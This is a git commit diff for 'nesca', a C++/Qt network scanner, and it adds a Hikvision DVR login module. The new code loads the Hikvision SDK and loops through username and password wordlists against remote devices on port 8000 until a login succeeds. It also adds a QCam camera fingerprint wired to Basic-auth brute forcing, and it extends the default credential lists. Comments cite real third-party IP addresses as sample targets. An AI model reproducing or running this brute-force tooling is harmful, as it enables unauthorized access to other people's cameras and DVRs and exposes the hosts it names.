Hikvision iVMS support added (Windows only)

This commit is contained in:
kvs 2015-04-28 19:00:51 +03:00
parent 86060899de
commit 6e1853e0ef
11 changed files with 220 additions and 223 deletions

View File

@ -106,10 +106,6 @@ int my_trace(CURL *handle, curl_infotype type,
return 0;
}
//struct MemoryStruct {
// char *memory;
// size_t size;
//};
size_t nWriteCallback(void *contents, size_t size, size_t nmemb, void *userp)
{
size_t realsize = size * nmemb;
@ -141,16 +137,9 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer,
const std::string *lpString,
bool digestMode){
buffer->clear();
//buffer->reserve(100000);
int res = 0;
CURL *curl = curl_easy_init();
//struct MemoryStruct chunk;
//chunk.memory = (char*)malloc(1); /* will be grown as needed by the realloc above */
//chunk.size = 0; /* no data at this point */
//std::string buffer2;
if (curl != NULL)
{
curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L);
@ -200,11 +189,6 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer,
curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST);
res = curl_easy_perform(curl);
//if (chunk.size > 0){
// //buffer2 = std::string(chunk.memory);
// buffer->append(chunk.memory, chunk.size);
//}
if (port != 21 && lpString != NULL) {
int pos = Utils::ustrstr(*buffer, "\r\n\r\n");
if (pos != -1) {
@ -216,33 +200,29 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer,
}
else res = curl_easy_perform(curl);
//if (chunk.size > 0){
// //buffer2 = std::string(chunk.memory);
// buffer->append(chunk.memory, chunk.size);
//}
int sz = buffer->size();
if (res == CURLE_OK ||
(port == 21 && buffer->size() > 0)) {
(port == 21 && sz > 0)) {
if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
Activity += buffer->size();
Activity += sz;
curl_easy_cleanup(curl);
return buffer->size();
return sz;
} else {
curl_easy_cleanup(curl);
if (res == 6) return -2;
if (res == 56 && port == 8000) return 1; //Hikvision
else if (res != 28 &&
res != 7 &&
res != 13 &&
res != 67 &&
res != 52 &&
res != 55 &&
res != 56 &&
res != 55 &&
res != 35 &&
res != 19 &&
res != 23) {
res != 23)
{
if (res == 5) {
stt->doEmitionRedFoundData("Couldn't resolve proxy. The given proxy host could not be resolved. ");
return -2;
@ -260,202 +240,21 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer,
}
else stt->doEmitionRedFoundData("CURL error: (" + QString::number(res) + ") " +
QString(ip) + ":" + QString::number(port));
}
} else return sz;
if(res == 23 && buffer->size() > 0) {
if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString("[OVERFLOW]"));
return buffer->size();
} else return -1;
if (res == 23 && sz > 0) {
return sz;
}
else return -1;
}
if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
return buffer->size();
return sz;
} else {
stt->doEmitionRedFoundData("Curl error.");
return -1;
};
}
//
//int Connector::nConnect2(const char* ip, const int port, std::string *buffer,
// const char *postData,
// const std::vector<std::string> *customHeaders,
// const std::string *lpString,
// bool digestMode)
//{
// buffer->clear();
//
// int still_running;
// struct timeval timeout;
// int res = 0;
// CURL *curl = curl_easy_init();
//
// if (curl != NULL)
// {
// curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L);
// if (MapWidgetOpened) {
// struct data config;
// config.trace_ascii = 1; /* enable ascii tracing */
// curl_easy_setopt(curl, CURLOPT_DEBUGFUNCTION, my_trace);
// curl_easy_setopt(curl, CURLOPT_DEBUGDATA, &config);
// curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);
// }
// curl_easy_setopt(curl, CURLOPT_URL, ip);
// curl_easy_setopt(curl, CURLOPT_PORT, port);
// curl_easy_setopt(curl, CURLOPT_USERAGENT,
// "Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0");
// curl_easy_setopt(curl, CURLOPT_HEADER, 1L);
// curl_easy_setopt(curl, CURLOPT_AUTOREFERER, 1L);
// curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
// curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
// curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback);
// curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer);
// int proxyPort = std::atoi(gProxyPort);
// if (strlen(gProxyIP) != 0 && (proxyPort > 0 && proxyPort < 65535)) {
// curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
// curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort);
// }
// else {
// curl_easy_setopt(curl, CURLOPT_PROXY, "");
// }
// curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
// curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut);
// curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3);
//
// if (postData != NULL) curl_easy_setopt(curl, CURLOPT_POSTFIELDS, postData);
//
// if (customHeaders != NULL) {
// struct curl_slist *chunk = NULL;
// for (auto &ch : *customHeaders) chunk = curl_slist_append(chunk, ch.c_str());
// curl_easy_setopt(curl, CURLOPT_HTTPHEADER, chunk);
// }
//
// if (lpString != NULL) {
// curl_easy_setopt(curl, CURLOPT_UNRESTRICTED_AUTH, 1L);
// curl_easy_setopt(curl, CURLOPT_FTPLISTONLY, 1L);
// curl_easy_setopt(curl, CURLOPT_USERPWD, lpString->c_str());
// if (digestMode) curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST);
// }
//
//
// CURLM *multi_handle = curl_multi_init();
// if (multi_handle == NULL) stt->doEmitionRedFoundData("curl_multi_init == NULL!");
// curl_multi_add_handle(multi_handle, curl);
//
// do { res = curl_multi_perform(multi_handle, &still_running); }
// while (res == CURLM_CALL_MULTI_PERFORM);
//
// while (still_running) {
// fd_set fdread;
// fd_set fdwrite;
// fd_set fdexcep;
// int maxfd = -1;
//
// FD_ZERO(&fdread);
// FD_ZERO(&fdwrite);
// FD_ZERO(&fdexcep);
//
// timeout.tv_sec = gTimeOut;
// timeout.tv_usec = 0;
//
// curl_multi_fdset(multi_handle, &fdread, &fdwrite, &fdexcep, &maxfd);
//
//#ifdef _WIN32
// Sleep(100);
//#else
// struct timeval wait = { 0, 100 * 1000 }; /* 100ms */
// rc = select(0, NULL, NULL, NULL, &wait);
//#endif
//
// /* get file descriptors from the transfers */
// switch (select(maxfd + 1, &fdread, &fdwrite, &fdexcep, &timeout)) {
// case -1:
// /* select error */
// still_running = 0;
// stt->doEmitionRedFoundData("select() returns error, this is badness");
// break;
// case 0:
// default:
// /* timeout or readable/writable sockets */
// do
// {
// res = curl_multi_perform(multi_handle, &still_running);
// } while (res == CURLM_CALL_MULTI_PERFORM);
// break;
// }
// }
//
// curl_multi_remove_handle(multi_handle, curl);
// curl_multi_cleanup(multi_handle);
// curl_easy_cleanup(curl);
//
// if (res == CURLE_OK ||
// (port == 21 && buffer->size() > 0)) {
//
// if (digestMode)
// {
// if (port != 21 && lpString != NULL) {
// int pos = Utils::ustrstr(*buffer, "\r\n\r\n");
// if (pos != -1) {
// *buffer = buffer->substr(pos + 4);
// }
// }
// }
//
// if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
// Activity += buffer->size();
// return buffer->size();
// }
// else {
// if (res == 6) return -2;
// else if (res != 28 &&
// res != 7 &&
// res != 67 &&
// res != 52 &&
// res != 55 &&
// res != 56 &&
// res != 35 &&
// res != 19 &&
// res != 23) {
// if (res == 5) {
// stt->doEmitionRedFoundData("Couldn't resolve proxy. The given proxy host could not be resolved. ");
// return -2;
// }
// else if (res == 13) {
// stt->doEmitionFoundData("Unknown ftp. (" + QString::number(res) + ") " +
// QString(ip) + ":" + QString::number(port));
// return -2;
// }
// else if (res == 8) {
// stt->doEmitionFoundData("Strange ftp reply. (" +
// QString::number(res) + ") " + QString(ip) +
// ":" + QString::number(port));
// return -2;
// }
// else if (res == 18) {
// stt->doEmitionFoundData("Inappropriate file size. (" +
// QString::number(res) + ") " + QString(ip) +
// ":" + QString::number(port));
// return -2;
// }
// else stt->doEmitionRedFoundData("CURL error: (" + QString::number(res) + ") " +
// QString(ip) + ":" + QString::number(port));
// }
//
// if (res == 23 && buffer->size() > 0) {
// if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString("[OVERFLOW]"));
// return buffer->size();
// }
// else return -1;
// }
//
// if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
// return buffer->size();
// }
// else {
// stt->doEmitionRedFoundData("Curl error.");
// return -1;
// };
//}
int Connector::connectToPort(char* ip, int port)
{
@ -467,7 +266,7 @@ int Connector::connectToPort(char* ip, int port)
std::string buffer;
int size = 0;
if (port == 22) size = SSHAuth::SSHLobby(ip, port, &buffer);
if (port == 22) size = SSHAuth::SSHLobby(ip, port, &buffer); //SSH
else size = nConnect(ip, port, &buffer);
if(size > 0)

62
HikvisionLogin.cpp Normal file
View File

@ -0,0 +1,62 @@
#include "HikvisionLogin.h"
#include "externData.h"
#include "FileUpdater.h"
bool HikVis::isInitialized = false;
void HikVis::hikInit(){
//hik_init_ptr();
}
void HikVis::hikCleanup(){
//hik_cleanup_ptr();
}
lopaStr HikVis::hikLogin(const char * sDVRIP, int wDVRPort)
{
lopaStr lps = { "UNKNOWN", "", "" };
int passCounter = 0;
for (int i = 0; i < MaxLogin; ++i) {
for (int j = 0; j < MaxPass; ++j) {
FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; });
if (!globalScanFlag) return lps;
NET_DVR_DEVICEINFO_V30 *info;
hik_init_ptr();
if (hik_login_ptr(sDVRIP, wDVRPort, loginLst[i], passLst[j], info) == 0) {
strcpy(lps.login, loginLst[i]);
strcpy(lps.pass, passLst[j]);
hik_cleanup_ptr();
return lps;
}
hik_cleanup_ptr();
if (BALogSwitched) stt->doEmitionBAData("HV: " + QString(sDVRIP) + ":" + QString::number(wDVRPort) +
"; l/p: " + QString(loginLst[i]) + ":" + QString(passLst[j]) + "; - Progress: (" +
QString::number((++passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%)");
Sleep(100);
}
}
return lps;
}
lopaStr HikVis::HVLobby(const char *ip, const int port) {
if (gMaxBrutingThreads > 0) {
while (BrutingThrds >= gMaxBrutingThreads) Sleep(1000);
++baCount;
++BrutingThrds;
const lopaStr &lps = hikLogin(ip, port);
--BrutingThrds;
return lps;
}
else {
lopaStr lps = { "UNKNOWN", "", "" };
return lps;
}
}

25
HikvisionLogin.h Normal file
View File

@ -0,0 +1,25 @@
#ifndef HIKVISIONLOGIN_H
#define HIKVISIONLOGIN_H
#include "STh.h"
#include "mainResources.h"
class HikVis {
public: static bool isInitialized;
private: lopaStr hikLogin(const char * sDVRIP, int wDVRPort);
public:
HikVis(){
hikInit();
}
~HikVis(){
hikCleanup();
}
void hikInit();
void hikCleanup();
lopaStr HVLobby(const char *ip, const int port);
};
#endif // UTILS_H

View File

@ -1,6 +1,8 @@
#ifndef EF_H
#define EF_H
#include <string>
extern std::string toLowerStr(const char *str);
extern char* strstri(const char *_Str, const char *_SubStr);

View File

@ -11,6 +11,7 @@
#include "FileUpdater.h"
#include "IPCAuth.h"
#include <qjsonobject.h>
#include "HikvisionLogin.h"
unsigned char tl(unsigned char d)
{
@ -395,6 +396,9 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const
&& Utils::ustrstr(buffcpy, "jsmain/liveview.js") != -1
) return 54; //Beward (http://46.146.243.88:88/login.asp)
if (Utils::ustrstr(buffcpy, "get_status.cgi") != -1
&& Utils::ustrstr(buffcpy, "str_device+") != -1) return 55; //QCam (http://1.177.123.118:8080/)
if(((Utils::ustrstr(buffcpy, "220") != -1) && (port == 21)) ||
(Utils::ustrstr(buffcpy, "220 diskStation ftp server ready") != -1) ||
(Utils::ustrstr(buffcpy, "220 ftp server ready") != -1)
@ -2334,7 +2338,18 @@ int Lexems::header(char *ip, int port, const char *str, Lexems *l, PathStr *ps,
int Lexems::filler(char* ip, int port, const std::string *buffcpy, int size, Lexems *lx)
{
if (port == 22)
if (HikVis::isInitialized && port == 8000) {
HikVis hv;
lopaStr lps = hv.HVLobby(ip, port);
if (strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0)
{
_specFillerBA(ip, port, "[Hikvision] iVMS client required.", lps.login, lps.pass, 0);
fillGlobalLogData(ip, port, std::to_string(size).c_str(), "[Hikvision] iVMS client required ().",
lps.login, lps.pass, "[Hikvision] iVMS", "UTF-8", "Basic Authorization");
return -1;
};
}
else if (port == 22)
{
_saveSSH(ip, 22, size, buffcpy->c_str());
return -1;
@ -2603,6 +2618,10 @@ int Lexems::filler(char* ip, int port, const std::string *buffcpy, int size, Lex
{
_specWEBIPCAMBrute(ip, port, "[BEWARD] WEB IP Camera", flag, "WEB Authorization", cp, size, "BEWARD");
}
else if (flag == 55) //QCam
{
_specBrute(ip, port, "IP Camera", flag, "/videostream.cgi", "Basic Authorization", cp, size);
}
else if (flag == 20) //AXIS Camera
{
if (_specBrute(ip, port, "AXIS Camera", flag, "/mjpg/video.mjpg", "Basic Authorization", cp, size) == -1) {

View File

@ -2,6 +2,7 @@ admin
root
123123
123456
support
12345
cisco
@ -31,3 +32,4 @@ cgadmin
777777
555555
111222333
ubnt

View File

@ -1,4 +1,4 @@
#pragma once
#pragma once
#include "base64.h"
#include <libssh/libssh.h>
@ -90,6 +90,28 @@ typedef int BOOL;
#define MAX_ADDR_LEN 128
#endif
struct NET_DVR_DEVICEINFO_V30
{
unsigned char sSerialNumber; //序列号
unsigned char byAlarmInPortNum; //报警输入个数
unsigned char byAlarmOutPortNum; //报警输出个数
unsigned char byDiskNum; //硬盘个数
unsigned char byDVRType; //设备类型, 1:DVR 2:ATM DVR 3:DVS ......
unsigned char byChanNum; //模拟通道个数
unsigned char byStartChan; //起始通道号,例如DVS-1,DVR - 1
unsigned char byAudioChanNum; //语音通道数
unsigned char byIPChanNum; //最大数字通道个数
unsigned char byZeroChanNum; //零通道编码个数 //2010-01-16
unsigned char byMainProto; //主码流传输协议类型 0-private, 1-rtsp
unsigned char bySubProto; //子码流传输协议类型0-private, 1-rtsp
unsigned char bySupport; //能力位与结果为0表示不支持1表示支持
unsigned char bySupport1; // 能力集扩充位与结果为0表示不支持1表示支持
unsigned char byRes1;
int wDevType; //设备型号
unsigned char byRes2; //保留
};
struct PathStr{
char codepage[32];
char headr[TITLE_MAX_SIZE];
@ -136,3 +158,17 @@ public:
int size,
Lexems *lx);
};
//Hikvision SDK extern functions
//typedef int(__stdcall *f_func)();
typedef void(__stdcall *NET_DVR_Init)();
typedef void(__stdcall *NET_DVR_Cleanup)();
typedef int(__stdcall *NET_DVR_Login_V30)(const char * sDVRIP,
int wDVRPort,
const char * sUserName,
const char * sPassword,
NET_DVR_DEVICEINFO_V30 *lpDeviceInfo);
extern NET_DVR_Init hik_init_ptr;
extern NET_DVR_Cleanup hik_cleanup_ptr;
extern NET_DVR_Login_V30 hik_login_ptr;

View File

@ -1,3 +1,6 @@
Analog Telephone Adapter
IP Dect -
AnyGate
Unable to open
WebDAV
Ruckus Wireless

View File

@ -16,6 +16,11 @@
#include <qmessagebox.h>
#include "progressbardrawer.h"
#include "FileDownloader.h"
#include "HikvisionLogin.h"
NET_DVR_Init hik_init_ptr = NULL;
NET_DVR_Cleanup hik_cleanup_ptr = NULL;
NET_DVR_Login_V30 hik_login_ptr = NULL;
QDate date = QDate::currentDate();
int ver = 100*(100*(date.year()%100) + date.month()) + date.day();
@ -2929,6 +2934,41 @@ QString GetColorCode(int mode, QString str)
return result;
}
void enableHikvisionSupport(){
HINSTANCE hGetProcIDDLL = LoadLibrary(L".\\HCNetSDK.dll");
if (!hGetProcIDDLL) {
HikVis::isInitialized = false;
stt->doEmitionRedFoundData("Could not load HCNetSDK.dll! Hikvision support disabled.");
return;
}
hik_init_ptr = (NET_DVR_Init)GetProcAddress(hGetProcIDDLL, "NET_DVR_Init");
if (!hik_init_ptr) {
HikVis::isInitialized = false;
stt->doEmitionRedFoundData("Could not locate hikInit()! Hikvision support disabled.");
return;
}
hik_login_ptr = (NET_DVR_Login_V30)GetProcAddress(hGetProcIDDLL, "NET_DVR_Login_V30");
if (!hik_login_ptr) {
HikVis::isInitialized = false;
stt->doEmitionRedFoundData("Could not locate hikLogin()! Hikvision support disabled.");
return;
}
hik_cleanup_ptr = (NET_DVR_Cleanup)GetProcAddress(hGetProcIDDLL, "NET_DVR_Cleanup");
if (!hik_cleanup_ptr) {
HikVis::isInitialized = false;
stt->doEmitionRedFoundData("Could not locate hikCleanup()! Hikvision support disabled.");
return;
}
HikVis::isInitialized = true;
stt->doEmitionGreenFoundData("Hikvision support enabled.");
}
nesca_3::nesca_3(QWidget *parent) : QMainWindow(parent)
{
setWindowFlags(Qt::FramelessWindowHint);
@ -2991,6 +3031,7 @@ nesca_3::nesca_3(QWidget *parent) : QMainWindow(parent)
};
#endif
std::thread fuThread(FileDownloader::checkWebFiles);
fuThread.detach();
@ -2998,6 +3039,12 @@ nesca_3::nesca_3(QWidget *parent) : QMainWindow(parent)
_startMsgCheck();
qrp.setMinimal(true);
drawVerboseArcs(0);
//[5.39.163.202] 8000 (? ) open
#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
enableHikvisionSupport();
#endif
}
nesca_3::~nesca_3()

View File

@ -17,6 +17,7 @@ qwerty
meinsm
monitor
user
support
test
sysadm
admin123
@ -55,3 +56,4 @@ fujiyama
super
P@ssw0rd
passw0rd
ubnt

View File

@ -1 +1 @@
24B99-78C
24B9C-72B